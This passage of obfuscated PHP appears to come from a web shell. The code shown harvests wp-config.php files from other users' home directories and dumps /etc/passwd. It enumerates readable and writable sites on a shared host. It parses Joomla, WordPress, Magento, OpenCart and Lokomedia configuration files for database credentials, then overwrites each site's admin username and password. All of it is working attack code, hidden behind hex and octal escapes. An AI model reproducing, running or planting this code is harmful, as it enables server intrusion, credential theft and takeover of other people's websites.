"\57\150\157\155\145\x33\57{$user_cox}\x2f\160\165\x62\x6c\x69\143\x5f\150\164\x6d\154\x2f\x70\x72\x65\x73\163\57\167\x70\55\143\157\x6e\x66\151\x67\x2e\x70\150\x70" => "\127\157\x72\x64\120\162\145\x73\x73\x50\162\145\x73\x73", "\57\x68\157\x6d\145\x33\57{$user_cox}\57\x70\165\142\154\151\x63\137\150\164\x6d\x6c\x2f\x57\x70\57\x77\x70\x2d\143\157\x6e\146\x69\x67\x2e\160\x68\160" => "\127\157\162\x64\x50\162\x65\x73\163\127\160", "\57\x68\x6f\x6d\x65\63\57{$user_cox}\57\160\165\142\154\x69\143\137\150\x74\155\154\x2f\x77\x70\x2f\x77\x70\55\x63\157\x6e\x66\151\x67\x2e\x70\150\x70" => "\x57\x6f\162\x64\x50\x72\x65\163\163\x57\x70", "\x2f\x68\x6f\x6d\145\63\57{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\137\x68\x74\x6d\x6c\x2f\x57\120\x2f\167\160\x2d\x63\157\x6e\146\x69\147\56\x70\x68\x70" => "\x57\157\162\144\120\162\145\x73\163\127\x50", "\x2f\150\x6f\x6d\x65\63\57{$user_cox}\x2f\x70\x75\x62\x6c\151\143\137\150\x74\155\x6c\x2f\160\x6f\x72\164\x61\x6c\57\x77\160\x2d\x63\x6f\156\146\151\x67\56\x70\150\160" => "\x57\157\x72\144\x50\162\145\163\163\x50\x6f\162\x74\141\154", "\57\x68\x6f\x6d\145\63\x2f{$user_cox}\x2f\x70\165\x62\154\151\143\137\150\x74\x6d\154\57\x50\117\122\124\x41\114\57\167\x70\55\x63\x6f\x6e\x66\151\147\x2e\x70\x68\160" => "\127\x6f\162\x64\x50\162\x65\x73\x73\x50\x6f\x72\164\x61\154", "\x2f\x68\157\155\145\63\57{$user_cox}\x2f\x70\165\x62\x6c\151\143\x5f\150\164\155\x6c\x2f\x50\157\x72\164\x61\154\x2f\167\x70\55\x63\x6f\x6e\x66\151\x67\x2e\x70\150\x70" => "\127\x6f\162\144\120\x72\x65\x73\163\x50\157\162\164\141\154"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("\143\157\x78\137\x63\157\156\x66\x69\x67\x2f{$user_cox}\55{$nama_config}\56\x74\x78\x74", "\x77"); fputs($file_config, $ambil_config); } } } } echo "\x3c\143\145\156\x74\145\162\x3e\x3c\141\40\150\162\145\x66\75\x27\x3f\144\x69\162\x3d{$dir}\x2f\x63\x6f\170\137\x63\157\156\146\151\147\x27\76\74\146\157\156\x74\x20\143\157\x6c\157\x72\75\154\151\155\145\x3e\104\x6f\156\145\74\57\146\157\x6e\164\76\74\x2f\141\x3e\x3c\x2f\x63\145\x6e\x74\145\x72\76"; } else { echo "\74\x66\157\162\155\x20\155\145\x74\150\x6f\x64\x3d\x22\160\x6f\x73\164\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\76\x3c\143\145\x6e\x74\145\162\76\145\x74\x63\x2f\160\x61\163\x73\167\40\50\40\x45\x72\x72\157\162\x20\77\40\x3c\x61\40\150\162\145\146\75\47\77\144\x69\162\75{$dir}\46\x64\157\75\160\141\x73\163\167\142\171\x70\141\163\163\47\76\102\x79\160\141\163\x73\x20\110\145\x72\x65\74\x2f\141\76\40\51\74\142\x72\x3e\74\x74\145\x78\164\x61\x72\x65\x61\x20\156\141\155\x65\75\x22\160\x61\163\163\167\x64\x22\x20\143\154\141\163\163\75\47\x61\x72\145\141\47\40\x72\157\x77\163\75\47\61\x35\x27\x20\x63\x6f\x6c\x73\x3d\47\x36\60\47\x3e\12"; echo file_get_contents("\57\x65\164\143\x2f\160\141\163\163\167\x64"); echo "\x3c\57\164\x65\170\164\x61\162\145\x61\76\x3c\142\162\76\x3c\x69\156\x70\165\164\40\x74\x79\x70\x65\x3d\42\163\x75\x62\x6d\x69\x74\x22\x20\x76\141\154\x75\145\75\x22\x47\x61\x73\x73\x50\157\x6c\x6c\x22\x3e\74\x2f\164\144\x3e\x3c\x2f\164\x72\76\x3c\x2f\143\145\156\164\145\x72\x3e\12"; } } elseif ($_GET["\144\x6f"] == "\x6a\165\155\x70\151\x6e\147") { $i = 0; echo "\74\160\162\x65\76\x3c\x64\151\x76\40\143\154\x61\x73\163\75\x27\155\x61\x72\147\151\x6e\72\40\65\x70\170\x20\x61\x75\164\157\73\x27\76"; $etc = fopen("\57\x65\x74\143\57\160\x61\x73\x73\167\x64", "\x72"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "\74\x66\157\156\x74\40\143\x6f\x6c\x6f\x72\x3d\162\x65\x64\76\x43\141\x6e\x27\164\x20\162\x65\x61\144\x20\57\x65\164\143\57\160\141\x73\163\x77\x64\74\x2f\x66\x6f\156\164\76"; } else { preg_match_all("\57\x28\56\52\x3f\51\72\x78\x3a\57", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "\x2f\150\x6f\155\145\x2f{$user_idx_jump}\57\x70\x75\x62\x6c\x69\x63\x5f\x68\164\155\x6c"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "\133\74\146\x6f\156\164\x20\143\x6f\154\157\162\x3d\154\151\155\x65\76\x52\x3c\57\x66\x6f\156\x74\76\135\x20\74\x61\40\150\162\145\x66\x3d\x27\77\x64\151\x72\x3d{$user_jumping_dir}\47\x3e\74\146\157\x6e\164\40\x63\x6f\x6c\x6f\162\x3d\x67\x6f\x6c\144\76{$user_jumping_dir}\74\57\146\157\x6e\164\76\x3c\x2f\x61\x3e\74\x62\x72\76"; if (is_writable($user_jumping_dir)) { $jrw = "\x5b\x3c\x66\x6f\x6e\x74\x20\143\x6f\x6c\157\162\75\154\151\x6d\x65\x3e\x52\127\x3c\x2f\146\x6f\x6e\164\x3e\x5d\40\x3c\141\x20\150\162\x65\146\x3d\47\77\x64\151\x72\75{$user_jumping_dir}\47\76\74\x66\157\156\164\40\143\x6f\x6c\157\162\x3d\x67\157\154\x64\76{$user_jumping_dir}\74\x2f\146\157\x6e\x74\x3e\x3c\57\x61\76\x3c\x62\162\76"; } echo $jrw; $domain_jump = file_get_contents("\57\x65\x74\x63\x2f\x6e\x61\x6d\145\x64\x2e\143\x6f\156\x66"); if ($domain_jump == '') { echo "\x20\75\x3e\40\50\40\74\146\157\x6e\x74\40\x63\x6f\x6c\157\x72\75\x72\x65\144\76\147\141\x62\x69\163\141\40\x61\155\142\x69\x6c\40\x6e\141\155\141\x20\x64\x6f\155\x61\x69\156\x20\156\171\141\74\57\146\x6f\x6e\x74\76\x20\x29\74\x62\x72\76"; } else { preg_match_all("\43\57\x76\141\x72\57\x6e\x61\155\x65\144\57\50\x2e\x2a\x3f\x29\56\144\x62\43", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("\57\145\164\143\x2f\x76\x61\154\x69\141\163\x65\163\57{$dj}")); $user_jumping_url = $user_jumping_url["\x6e\141\155\145"]; if ($user_jumping_url == $user_idx_jump) { echo "\40\75\x3e\40\x28\40\x3c\x75\76{$dj}\74\57\x75\x3e\40\x29\74\x62\x72\x3e"; break; } } } } } } } if ($i == 0) { } else { echo "\74\x62\x72\x3e\124\157\164\141\154\x20\x61\x64\141\40" . $i . "\40\113\151\155\x63\151\154\x20\x64\151\x20" . gethostbyname($_SERVER["\110\124\x54\120\x5f\x48\117\123\124"]) . ''; } echo "\x3c\57\144\151\166\x3e\74\57\x70\162\145\76"; } elseif ($_GET["\144\157"] == "\141\165\164\157\137\145\144\x69\x74\x5f\165\x73\x65\162") { if ($_POST["\150\141\x6a\141\x72"]) { if (strlen($_POST["\160\141\163\x73\137\x62\141\x72\x75"]) < 6 or strlen($_POST["\165\x73\145\x72\137\x62\x61\162\x75"]) < 6) { echo "\x75\163\145\x72\x6e\141\x6d\145\x20\x61\164\x61\x75\40\160\x61\163\163\167\x6f\x72\x64\x20\150\141\162\165\163\40\154\145\x62\151\x68\x20\x64\x61\162\151\40\x36\40\153\141\162\141\x6b\x74\145\162"; } else { $user_baru = $_POST["\165\163\145\162\x5f\142\141\162\165"]; $pass_baru = md5($_POST["\160\x61\x73\x73\x5f\142\x61\x72\x75"]); $conf = $_POST["\x63\157\156\146\151\147\x5f\x64\x69\x72"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}\57{$file_conf}")) { continue; } $config = file_get_contents("{$conf}\57{$file_conf}"); if (preg_match("\x2f\112\x43\157\156\x66\151\147\174\152\157\x6f\x6d\x6c\141\x2f", $config)) { $dbhost = ambilkata($config, "\150\157\163\164\40\75\x20\x27", "\x27"); $dbuser = ambilkata($config, "\165\163\145\162\x20\75\40\47", "\x27"); $dbpass = ambilkata($config, "\x70\141\163\x73\x77\157\x72\x64\x20\x3d\x20\47", "\47"); $dbname = ambilkata($config, "\x64\x62\40\75\x20\x27", "\47"); $dbprefix = ambilkata($config, "\x64\x62\160\162\x65\146\151\170\x20\x3d\40\x27", "\47"); $prefix = $dbprefix . "\x75\163\145\x72\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\105\114\x45\x43\x54\x20\52\x20\106\122\x4f\115\x20{$prefix}\x20\x4f\122\104\x45\122\x20\102\x59\x20\151\144\x20\x41\123\x43"); $result = mysql_fetch_array($q); $id = $result["\151\144"]; $site = ambilkata($config, "\163\x69\164\145\x6e\x61\x6d\x65\40\x3d\x20\47", "\47"); $update = mysql_query("\x55\120\x44\x41\124\105\x20{$prefix}\x20\123\105\124\40\165\x73\x65\x72\x6e\141\x6d\x65\75\47{$user_baru}\47\54\x70\141\x73\163\167\x6f\x72\x64\75\47{$pass_baru}\x27\x20\x57\x48\x45\x52\x45\40\x69\144\x3d\x27{$id}\47"); echo "\103\157\156\x66\x69\147\40\x3d\76\x20" . $file_conf . "\x3c\142\162\76"; echo "\103\115\123\40\x3d\76\40\112\157\157\155\x6c\141\x3c\142\x72\76"; if ($site == '') { echo "\x53\x69\x74\145\156\141\x6d\x65\40\75\76\x20\x3c\x66\157\x6e\164\40\x63\157\x6c\x6f\x72\x3d\162\x65\144\x3e\x65\x72\162\157\162\54\40\x67\141\x62\151\x73\141\40\x61\x6d\142\x69\x6c\x20\x6e\x61\155\x61\x20\x64\x6f\155\141\x69\x6e\40\x6e\x79\x61\74\x2f\146\x6f\156\164\76\x3c\x62\x72\x3e"; } else { echo "\x53\151\164\145\x6e\141\x6d\x65\x20\x3d\76\40{$site}\74\x62\x72\x3e"; } if (!$update or !$conn or !$db) { echo "\123\164\x61\164\165\163\40\x3d\x3e\40\74\146\157\x6e\x74\40\143\x6f\154\157\x72\x3d\162\x65\144\76" . mysql_error() . "\x3c\x2f\x66\x6f\x6e\164\76\74\142\x72\76\74\x62\x72\x3e"; } else { echo "\x53\164\x61\164\165\x73\40\75\x3e\x20\x3c\146\x6f\156\164\x20\143\x6f\154\157\x72\75\x6c\x69\x6d\x65\x3e\163\x75\x6b\x73\x65\163\x20\145\x64\x69\164\40\165\163\145\162\x2c\40\163\151\x6c\x61\153\141\156\x20\x6c\157\147\151\x6e\40\144\145\x6e\x67\141\x6e\x20\x75\x73\145\x72\x20\x26\x20\x70\141\x73\163\x20\x79\x61\156\147\x20\142\141\x72\165\x2e\74\57\x66\x6f\x6e\164\76\x3c\x62\x72\76\74\x62\162\76"; } mysql_close($conn); } elseif (preg_match("\x2f\x57\x6f\x72\x64\x50\162\x65\163\x73\57", $config)) { $dbhost = ambilkata($config, "\x44\102\137\x48\x4f\x53\x54\47\54\x20\x27", "\x27"); $dbuser = ambilkata($config, "\104\102\x5f\x55\123\105\122\x27\54\40\47", "\47"); $dbpass = ambilkata($config, "\104\x42\x5f\120\101\123\x53\x57\x4f\x52\104\47\x2c\x20\47", "\x27"); $dbname = ambilkata($config, "\104\x42\x5f\x4e\x41\115\x45\47\x2c\x20\47", "\x27"); $dbprefix = ambilkata($config, "\x74\x61\142\154\145\137\x70\x72\145\x66\x69\x78\40\40\75\40\47", "\47"); $prefix = $dbprefix . "\165\x73\x65\162\x73"; $option = $dbprefix . "\157\160\x74\151\157\156\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\105\114\105\x43\124\x20\x2a\40\106\122\x4f\x4d\x20{$prefix}\40\117\x52\x44\x45\122\40\102\131\40\x69\144\x20\101\123\x43"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\x53\105\114\105\x43\124\x20\x2a\x20\106\x52\117\115\40{$option}\x20\x4f\122\104\x45\x52\40\x42\x59\40\157\160\164\x69\157\x6e\137\x69\x64\40\x41\123\103"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "\x4c\x6f\147\x69\156\x20\x3d\76\40\74\146\157\x6e\x74\40\x63\157\x6c\157\x72\x3d\x72\x65\x64\76\145\162\162\157\x72\x2c\40\x67\x61\x62\x69\x73\141\x20\x61\x6d\142\x69\x6c\x20\156\x61\155\141\x20\144\157\x6d\141\x69\x6e\x20\x6e\171\141\x61\74\57\x66\x6f\156\164\x3e\74\142\162\x3e"; } else { $url_target = "\x4c\x6f\147\x69\156\x20\75\76\40\x3c\141\40\150\x72\x65\146\75\x27{$target}\x2f\x77\160\55\154\x6f\147\151\156\56\160\150\x70\x27\40\x74\x61\162\x67\x65\x74\75\47\x5f\142\x6c\141\156\153\47\x3e\x3c\x75\76{$target}\x2f\x77\160\55\x6c\157\147\x69\156\x2e\160\150\160\74\57\165\x3e\74\57\x61\x3e\x3c\x62\x72\x3e"; } $update = mysql_query("\125\120\104\101\124\105\x20{$prefix}\40\x53\105\124\40\165\163\145\x72\137\x6c\157\x67\151\156\75\x27{$user_baru}\47\54\165\163\x65\162\x5f\160\141\163\163\75\47{$pass_baru}\47\40\127\110\x45\x52\x45\40\151\144\x3d\x27{$id}\47"); echo "\x43\x6f\156\146\151\x67\40\75\x3e\40" . $file_conf . "\74\x62\162\x3e"; echo "\x43\x4d\123\x20\x3d\76\x20\127\157\162\144\x70\x72\145\x73\x73\74\x62\x72\76"; echo $url_target; if (!$update or !$conn or !$db) { echo "\123\x74\141\x74\165\x73\40\x3d\76\40\74\x66\x6f\x6e\x74\x20\x63\157\x6c\157\x72\75\162\x65\x64\x3e" . mysql_error() . "\74\x2f\146\x6f\156\164\76\x3c\x62\x72\76\74\x62\162\76"; } else { echo "\x53\164\141\x74\165\x73\40\x3d\x3e\x20\x3c\146\157\156\x74\40\x63\157\x6c\157\x72\75\154\x69\x6d\145\76\x73\165\x6b\163\145\163\x20\x65\144\151\x74\x20\x75\163\145\162\54\40\163\151\154\141\153\141\x6e\40\x6c\x6f\x67\x69\x6e\40\144\145\x6e\147\141\156\40\x75\x73\145\x72\40\x26\x20\x70\141\163\x73\40\x79\x61\156\x67\x20\142\x61\x72\x75\x2e\74\x2f\x66\x6f\156\164\x3e\74\x62\x72\76\74\x62\162\76"; } mysql_close($conn); } elseif (preg_match("\x2f\x4d\x61\x67\x65\x6e\x74\x6f\174\x4d\x61\147\145\137\103\x6f\x72\x65\57", $config)) { $dbhost = ambilkata($config, "\74\150\157\163\164\76\74\x21\133\x43\x44\101\x54\x41\x5b", "\x5d\135\76\74\57\150\x6f\x73\164\76"); $dbuser = ambilkata($config, "\x3c\165\163\x65\x72\x6e\x61\x6d\145\x3e\x3c\x21\133\x43\x44\x41\124\x41\x5b", "\x5d\x5d\x3e\74\x2f\165\163\145\162\156\141\x6d\x65\x3e"); $dbpass = ambilkata($config, "\x3c\x70\141\x73\x73\167\157\162\x64\76\74\41\133\x43\104\x41\x54\101\x5b", "\x5d\x5d\76\74\x2f\x70\141\163\163\167\157\162\144\x3e"); $dbname = ambilkata($config, "\x3c\144\x62\x6e\x61\x6d\x65\x3e\x3c\x21\133\x43\x44\x41\124\x41\x5b", "\135\135\76\74\x2f\144\142\x6e\x61\x6d\x65\76"); $dbprefix = ambilkata($config, "\x3c\x74\x61\142\154\x65\x5f\160\162\x65\x66\151\170\76\74\x21\133\103\104\x41\124\x41\x5b", "\135\x5d\76\x3c\x2f\x74\141\x62\x6c\145\137\160\162\145\146\151\x78\76"); $prefix = $dbprefix . "\141\144\155\151\x6e\137\x75\x73\x65\x72"; $option = $dbprefix . "\x63\x6f\x72\145\x5f\143\157\156\146\x69\147\137\144\141\x74\x61"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\105\114\105\x43\x54\40\52\x20\x46\122\117\115\40{$prefix}\x20\117\122\104\x45\x52\x20\102\131\x20\165\163\x65\x72\137\151\144\40\x41\123\103"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("\123\105\114\x45\x43\x54\x20\x2a\40\106\x52\x4f\x4d\40{$option}\x20\127\x48\x45\122\105\40\x70\x61\x74\150\x3d\47\x77\145\x62\57\163\x65\x63\165\x72\x65\57\142\x61\x73\145\137\x75\162\x6c\x27"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "\x4c\x6f\x67\x69\156\40\75\x3e\x20\74\146\x6f\x6e\x74\x20\x63\x6f\154\x6f\x72\x3d\x72\x65\x64\x3e\145\162\x72\157\x72\54\x20\x67\x61\142\151\x73\x61\40\141\155\x62\151\154\40\x6e\x61\x6d\x61\40\x64\157\x6d\141\x69\156\x20\156\171\141\141\x3c\x2f\146\x6f\156\x74\76\x3c\142\x72\x3e"; } else { $url_target = "\x4c\157\147\x69\x6e\x20\x3d\x3e\x20\x3c\x61\x20\150\x72\145\146\75\x27{$target}\57\141\144\155\151\156\x2f\x27\40\x74\x61\162\147\145\164\x3d\x27\137\142\154\141\156\x6b\x27\76\x3c\x75\x3e{$target}\x2f\x61\144\x6d\x69\x6e\x2f\x3c\x2f\x75\76\74\x2f\x61\76\74\x62\162\x3e"; } $update = mysql_query("\125\120\104\101\x54\x45\40{$prefix}\40\123\105\124\40\165\x73\x65\162\156\141\155\145\x3d\x27{$user_baru}\47\54\x70\141\163\163\167\157\x72\144\x3d\47{$pass_baru}\x27\40\127\110\105\122\x45\40\165\163\145\x72\x5f\x69\144\75\47{$id}\47"); echo "\x43\157\156\x66\151\147\40\75\76\40" . $file_conf . "\x3c\x62\x72\x3e"; echo "\x43\115\123\x20\75\x3e\x20\x4d\141\147\145\x6e\x74\157\x3c\x62\162\x3e"; echo $url_target; if (!$update or !$conn or !$db) { echo "\x53\x74\141\164\165\x73\x20\75\x3e\40\74\x66\x6f\156\164\40\143\157\x6c\157\x72\x3d\162\145\x64\76" . mysql_error() . "\x3c\57\146\157\156\164\76\x3c\142\162\x3e\74\142\162\x3e"; } else { echo "\x53\x74\141\164\x75\163\x20\75\x3e\40\74\x66\157\x6e\x74\40\x63\157\x6c\x6f\162\x3d\154\151\x6d\x65\x3e\x73\165\x6b\x73\x65\x73\40\x65\x64\x69\x74\x20\165\x73\x65\x72\54\40\163\x69\x6c\x61\x6b\141\156\x20\x6c\x6f\x67\x69\x6e\40\x64\x65\156\x67\141\x6e\x20\x75\163\x65\162\x20\46\x20\160\141\x73\x73\x20\171\141\156\147\40\142\141\162\165\56\74\x2f\146\x6f\x6e\164\x3e\74\142\162\x3e\x3c\x62\x72\x3e"; } mysql_close($conn); } elseif (preg_match("\57\x48\x54\x54\120\x5f\123\x45\x52\x56\105\x52\174\x48\x54\124\x50\x5f\x43\x41\124\101\x4c\x4f\107\x7c\x44\x49\x52\137\x43\117\116\106\x49\x47\x7c\104\x49\x52\137\123\x59\x53\x54\105\x4d\x2f", $config)) { $dbhost = ambilkata($config, "\x27\x44\x42\x5f\x48\117\123\124\x4e\x41\x4d\105\x27\54\x20\x27", "\47"); $dbuser = ambilkata($config, "\47\x44\x42\x5f\x55\x53\105\122\116\x41\x4d\105\47\54\x20\x27", "\47"); $dbpass = ambilkata($config, "\x27\104\102\137\120\101\x53\x53\x57\x4f\122\104\47\54\x20\47", "\x27"); $dbname = ambilkata($config, "\47\x44\102\137\x44\101\124\x41\102\101\x53\105\x27\54\x20\47", "\x27"); $dbprefix = ambilkata($config, "\47\x44\x42\137\x50\x52\x45\x46\111\130\47\54\40\x27", "\47"); $prefix = $dbprefix . "\165\163\145\162"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\x45\114\105\x43\124\x20\x2a\x20\x46\x52\x4f\115\x20{$prefix}\40\x4f\x52\104\105\122\x20\x42\131\x20\165\163\145\x72\137\151\x64\40\101\123\x43"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config, "\x48\x54\124\x50\x5f\x53\105\122\x56\105\122\x27\54\x20\47", "\x27"); if ($target == '') { $url_target = "\x4c\x6f\147\x69\x6e\x20\x3d\76\x20\74\x66\x6f\156\164\x20\x63\x6f\x6c\157\x72\75\162\x65\x64\76\145\x72\x72\157\162\54\x20\x67\141\142\x69\163\141\40\x61\155\x62\151\x6c\x20\156\x61\155\x61\x20\144\x6f\x6d\x61\x69\156\40\156\171\x61\141\74\57\x66\157\156\x74\76\74\x62\x72\x3e"; } else { $url_target = "\114\x6f\147\151\x6e\40\75\x3e\x20\74\141\40\x68\162\145\x66\x3d\x27{$target}\x27\40\x74\141\x72\x67\145\164\x3d\47\137\x62\154\141\x6e\153\47\x3e\x3c\165\x3e{$target}\74\57\165\76\74\x2f\141\76\x3c\142\162\76"; } $update = mysql_query("\x55\x50\x44\x41\124\x45\40{$prefix}\40\123\105\124\40\165\x73\x65\x72\156\x61\155\145\x3d\47{$user_baru}\x27\x2c\x70\141\x73\163\167\157\162\x64\75\47{$pass_baru}\47\x20\127\110\x45\x52\x45\40\165\x73\x65\162\137\151\144\x3d\x27{$id}\47"); echo "\103\157\156\146\x69\147\40\x3d\76\x20" . $file_conf . "\74\x62\162\x3e"; echo "\x43\115\123\40\x3d\x3e\x20\x4f\160\x65\156\x43\x61\x72\164\74\x62\x72\76"; echo $url_target; if (!$update or !$conn or !$db) { echo "\x53\x74\141\164\x75\x73\x20\x3d\76\x20\x3c\x66\157\156\164\40\143\x6f\154\x6f\162\75\162\145\x64\76" . mysql_error() . "\74\57\x66\x6f\x6e\x74\76\74\x62\162\76\74\x62\162\x3e"; } else { echo "\x53\x74\141\x74\165\163\40\75\76\40\x3c\x66\x6f\x6e\x74\40\143\157\154\157\162\x3d\154\151\x6d\145\76\163\165\153\163\145\x73\x20\145\x64\151\164\x20\165\163\145\162\x2c\40\x73\151\x6c\x61\x6b\x61\x6e\x20\154\157\147\x69\x6e\x20\144\x65\156\147\141\156\x20\165\163\x65\162\x20\46\x20\x70\141\163\163\40\x79\x61\x6e\x67\40\142\x61\162\x75\x2e\74\x2f\x66\157\x6e\x74\76\x3c\x62\162\76\x3c\x62\162\76"; } mysql_close($conn); } elseif (preg_match("\x2f\x70\141\x6e\147\147\151\x6c\40\x66\165\x6e\147\163\x69\40\x76\x61\x6c\x69\144\141\163\151\40\x78\163\163\x20\144\x61\156\x20\151\x6e\152\145\x63\x74\x69\x6f\156\57", $config)) { $dbhost = ambilkata($config, "\163\x65\162\x76\x65\162\40\75\40\x22", "\42"); $dbuser = ambilkata($config, "\165\163\145\162\156\141\155\x65\40\75\x20\x22", "\42"); $dbpass = ambilkata($config, "\160\141\x73\x73\167\x6f\162\144\x20\75\x20\x22", "\42"); $dbname = ambilkata($config, "\x64\x61\164\x61\142\x61\x73\x65\40\75\x20\x22", "\x22"); $prefix = "\165\x73\145\162\163"; $option = "\151\x64\x65\156\x74\x69\x74\141\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\105\114\105\x43\x54\x20\x2a\40\106\x52\117\x4d\40{$option}\40\117\122\104\105\x52\40\102\x59\x20\151\144\x5f\151\x64\x65\x6e\164\x69\164\x61\x73\40\101\123\103"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "\114\x6f\x67\x69\156\40\75\76\x20\x3c\146\157\156\x74\40\143\x6f\154\157\162\x3d\162\145\x64\76\145\x72\162\157\162\54\x20\147\141\x62\x69\163\141\x20\x61\155\142\151\x6c\40\x6e\x61\x6d\x61\40\x64\157\155\x61\151\x6e\x20\x6e\x79\x61\x61\74\57\146\x6f\156\164\76\x3c\142\x72\x3e"; if ($target2 == '') { $url_target2 = "\114\x6f\x67\151\156\40\75\x3e\40\x3c\146\157\x6e\x74\40\x63\157\154\x6f\162\75\162\x65\144\76\145\162\x72\157\x72\54\40\x67\141\142\151\x73\x61\x20\x61\x6d\x62\x69\154\x20\x6e\x61\155\x61\40\x64\x6f\155\x61\x69\156\40\156\171\x61\x61\x3c\x2f\x66\x6f\x6e\x74\x3e\x3c\x62\x72\76"; } else { $cek_login3 = file_get_contents("{$target2}\x2f\x61\x64\x6d\151\x6e\x77\145\x62\x2f"); $cek_login4 = file_get_contents("{$target2}\x2f\154\157\153\x6f\155\145\144\x69\x61\x2f\x61\144\x6d\151\x6e\167\x65\142\57"); if (preg_match("\x2f\103\x4d\x53\40\114\x6f\x6b\157\155\145\x64\x69\141\x7c\x41\x64\155\x69\x6e\151\163\164\x72\141\164\x6f\162\x2f", $cek_login3)) { $url_target2 = "\x4c\157\147\151\x6e\x20\x3d\x3e\x20\74\x61\x20\x68\162\145\146\x3d\x27{$target2}\57\141\144\155\x69\x6e\x77\145\142\x27\x20\x74\141\162\147\145\x74\x3d\x27\137\142\154\x61\156\153\x27\x3e\x3c\165\x3e{$target2}\57\141\x64\x6d\151\156\167\145\142\x3c\x2f\165\76\74\x2f\x61\76\74\142\162\x3e"; } elseif (preg_match("\x2f\103\115\123\x20\x4c\157\153\x6f\155\145\144\x69\141\174\114\157\153\157\x6d\145\x64\151\x61\57", $cek_login4)) { $url_target2 = "\114\x6f\147\151\156\40\75\76\40\x3c\x61\40\150\162\x65\146\75\47{$target2}\57\154\x6f\153\157\x6d\145\144\x69\141\57\141\x64\x6d\x69\x6e\167\x65\x62\x27\40\x74\141\162\x67\145\164\75\47\137\142\154\x61\x6e\x6b\x27\x3e\74\165\76{$target2}\57\154\157\x6b\x6f\x6d\x65\144\151\x61\57\141\x64\155\x69\x6e\x77\x65\142\74\57\165\x3e\74\x2f\141\x3e\x3c\142\162\x3e"; } else { $url_target2 = "\x4c\157\x67\x69\x6e\x20\x3d\x3e\x20\74\141\40\150\162\x65\146\75\47{$target2}\47\40\164\x61\162\x67\x65\164\x3d\47\137\142\154\141\x6e\x6b\x27\x3e\x3c\165\x3e{$target2}\74\57\165\76\74\x2f\141\x3e\x20\x5b\40\74\x66\157\156\x74\x20\x63\x6f\154\157\162\75\162\x65\x64\x3e\x67\141\x74\141\165\40\x61\144\155\x69\156\40\x6c\x6f\147\151\156\40\156\171\x61\x20\x64\151\x6d\x61\x6e\141\x20\x3a\160\x3c\x2f\146\x6f\x6e\x74\x3e\40\135\74\x62\x72\x3e"; } } } else { $cek_login = file_get_contents("{$target}\x2f\x61\x64\x6d\151\156\167\145\x62\x2f"); $cek_login2 = file_get_contents("{$target}\x2f\x6c\x6f\x6b\x6f\x6d\145\144\x69\141\57\141\x64\x6d\x69\x6e\x77\145\x62\57"); if (preg_match("\x2f\x43\x4d\123\40\114\x6f\x6b\157\x6d\145\144\x69\x61\174\101\x64\155\151\156\151\163\x74\x72\x61\164\157\x72\x2f", $cek_login)) { $url_target = "\114\157\x67\x69\x6e\40\75\x3e\40\x3c\x61\x20\150\162\145\146\x3d\47{$target}\57\x61\x64\155\151\156\x77\145\x62\x27\x20\x74\141\x72\x67\x65\164\75\47\x5f\142\x6c\x61\156\x6b\x27\76\x3c\165\76{$target}\57\x61\x64\x6d\151\156\167\x65\x62\74\x2f\165\76\x3c\57\141\x3e\x3c\x62\x72\x3e"; } elseif (preg_match("\x2f\103\115\x53\x20\x4c\157\x6b\157\155\x65\144\x69\x61\x7c\114\x6f\153\157\155\x65\144\151\141\x2f", $cek_login2)) { $url_target = "\114\x6f\x67\x69\x6e\40\x3d\76\40\74\x61\40\x68\x72\145\146\75\x27{$target}\57\x6c\157\x6b\x6f\155\145\144\x69\x61\x2f\141\144\155\x69\156\x77\145\142\47\x20\x74\x61\x72\147\x65\164\x3d\47\x5f\x62\x6c\141\156\x6b\47\76\74\165\76{$target}\x2f\154\x6f\153\157\x6d\145\x64\151\x61\x2f\141\x64\155\x69\156\167\x65\x62\x3c\57\x75\x3e\74\57\141\76\74\142\x72\x3e"; } else { $url_target = "\114\x6f\147\151\156\x20\75\x3e\40\x3c\141\x20\x68\162\x65\x66\75\x27{$target}\47\40\x74\x61\x72\x67\145\164\75\x27\x5f\142\x6c\141\156\153\x27\76\x3c\x75\x3e{$target}\74\x2f\x75\x3e\74\x2f\141\76\x20\x5b\x20\74\x66\157\x6e\x74\40\143\157\x6c\x6f\162\x3d\162\145\x64\x3e\x67\x61\x74\x61\x75\x20\x61\144\x6d\151\156\x20\x6c\157\x67\151\x6e\40\x6e\171\141\x20\144\151\155\x61\156\x61\x20\72\160\74\57\146\157\156\164\76\x20\135\74\142\x72\76"; } } $update = mysql_query("\x55\120\104\101\x54\105\x20{$prefix}\40\123\x45\124\40\165\163\145\162\156\x61\155\145\75\47{$user_baru}\x27\54\x70\141\x73\163\x77\157\162\144\75\x27{$pass_baru}\x27\40\x57\x48\x45\x52\105\x20\x6c\x65\x76\145\154\x3d\x27\x61\x64\x6d\x69\156\47"); echo "\x43\157\x6e\x66\151\x67\x20\x3d\x3e\40" . $file_conf . "\x3c\142\x72\x3e"; echo 